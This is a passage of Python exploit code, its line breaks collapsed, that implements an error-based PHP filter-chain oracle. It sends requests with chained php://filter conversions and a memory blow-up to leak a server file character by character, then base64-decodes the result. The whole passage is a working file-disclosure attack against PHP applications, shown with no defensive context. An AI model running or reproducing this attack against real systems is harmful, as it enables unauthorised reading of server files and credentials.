req(f'{prefix}|string.rot13|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):# Ureturn 'U'elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# greturn 'g'elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# Greturn 'G'elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# treturn 't'elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# Treturn 'T'else:err('something wrong')print()
for i in range(100):prefix = f'{header}|{get_nth(i)}'letter = find_letter(prefix)# it's a number! check base64if letter == '*':prefix = f'{header}|{get_nth(i)}|convert.base64-encode's = find_letter(prefix)if s == 'M':# 0 - 3prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'ss = find_letter(prefix)if ss in 'CDEFGH':letter = '0'elif ss in 'STUVWX':letter = '1'elif ss in 'ijklmn':letter = '2'elif ss in 'yz*':letter = '3'else:err(f'bad num ({ss})')elif s == 'N':# 4 - 7prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'ss = find_letter(prefix)if ss in 'CDEFGH':letter = '4'elif ss in 'STUVWX':letter = '5'elif ss in 'ijklmn':letter = '6'elif ss in 'yz*':letter = '7'else:err(f'bad num ({ss})')elif s == 'O':# 8 - 9prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'ss = find_letter(prefix)if ss in 'CDEFGH':letter = '8'elif ss in 'STUVWX':letter = '9'else:err(f'bad num ({ss})')else:err('wtf')print(end=letter)o += lettersys.stdout.flush()"""
We are done!! :)
"""print()
d = b64decode(o.encode() + b'=' * 4)
# remove KR padding
d = d.replace(b'$)C',b'')
print(b64decode(d))